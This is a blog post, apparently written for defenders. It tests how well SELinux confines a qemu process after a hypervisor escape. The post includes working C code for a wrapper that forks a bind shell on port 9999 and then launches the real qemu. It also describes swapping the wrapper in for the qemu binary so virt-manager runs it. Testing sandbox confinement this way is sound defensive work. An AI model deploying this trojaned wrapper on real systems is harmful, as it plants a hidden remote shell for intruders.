Hypervisor escape and SELinux
Yesterday someone released 0day exploit for VirtualBox E1000 network card vulnerability. In effect, when this vulnerability is exploited successfully, the attacker gains access to the host process.
These things do exist, and VirtualBox is not the only hypervisor in this game. The CVE list for qemu is also pretty impressive.
So what exactly is so serious in this sort of exploitation? The bottom line is this: many times people use hypervisor for containing code for security purposes, so guest to host escape -exploitation renders this security measure totally useless. Best way to think about it is just another type of privilege escalation. And it doesn’t stop here: when the malicious code is running on a host system, all other guests in addition to the exploited one are also in danger.
Hypervisors like VirtualBox, VMWare and qemu are very complicated, so we better prepare for this type of privilege escalation vulnerabilities. How to do it?
Well it turns out that at least on RH-based systems (RHEL, Fedora, CentOS) the default SELinux policy for libvirt provides pretty decent mitigation for qemu-based VM’s, as explained in Dan Walsh’s blog. The idea is simple: the hypervisor should be able to access only what is required to run the VM; its configuration and disk files and so on. It should not be able to access user’s home directory, execute arbitrary binaries etc. This sounds like a good mitigation, but does it work in practice? Let’s find out.
First I wanted to figure out the most simple way to simulate hypervisor exploitation, so I just cut some corners and assumed that the malicious code would be running fully on the host. I created this very simple wrapper code for executing qemu-system-x86_64:
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
int main(int argc, char **argv) {
int pid = fork();
if ( pid == 0 ) {
/* evil shellcode */
int host_sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in host_addr;
host_addr.sin_family = AF_INET;
host_addr.sin_port = htons(9999);
host_addr.sin_addr.s_addr = INADDR_ANY;
bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
listen(host_sock, 0);
int client_sock = accept(host_sock, NULL, NULL);
dup2(client_sock, 0);
dup2(client_sock, 1);
dup2(client_sock, 2);
execve("/bin/sh", NULL, NULL);
} else {
execv("/usr/bin/qemu-system-x86_64-real", argv);
}
return 0;
}
The above code simulates shell code by executing a child process that spawns a bind shell on port 9999
and then executes the real qemu binary with original arguments and environment. I tested this from command line, and everything works. qemu executes and the “exploit code” runs.
Then I renamed qemu-system-x86_64
as qemu-system-x86_64-real
, and copied my wrapper code as qemu-system-x86_64
and this time I executed the qemu implicitly with virt-manager
. The VM ran normally, and the bind shell executed on port 9999. This is more or less what the bad guys would do. Instead of spawning shell like this, they would most likely try to fetch the actual payload from some network location, but for my SELinux testing, this is useful because it’s what the attacker would see when running with the host privileges.
So what kind of information the qemu host process can access and what not? I just did some very quick tests:
- It can access processes initiated by
qemu-system-x86_64
wrapper itself, the child process (real qemu) and then the shell, and all its child processes. Nothing else. So it cannot access for example browsers, or anything else running on the host. It cannot even see them (ps
list is basically empty). - It can read system-readable files, for example in
/etc
. - It can write to system-writable locations, such as
/tmp
. - It can initiate network connections (this is obvious, since the guest is supposed to be able to do this freely).
- It cannot access other qemu-processes (because of random MSC labels).
- It cannot even
cd
to/home/user
. - Many application won’t function properly: I got lots of error messages for
mmap
system call. Some programs, likeping
orsudo
won’t run at all (access denied) - most likely because of the SUID bits.
So at the very least the compromised qemu is able to poke around in the system and determine the system configuration, but it cannot (at least very easily) install any code, modify any system files, and get any sensitive information from running processes. It can gather system information from /etc
and send it off to mothership, but it can hardly claim it owns this system. Much more than that is needed, namely privilege escalation from the SELinux sandbox.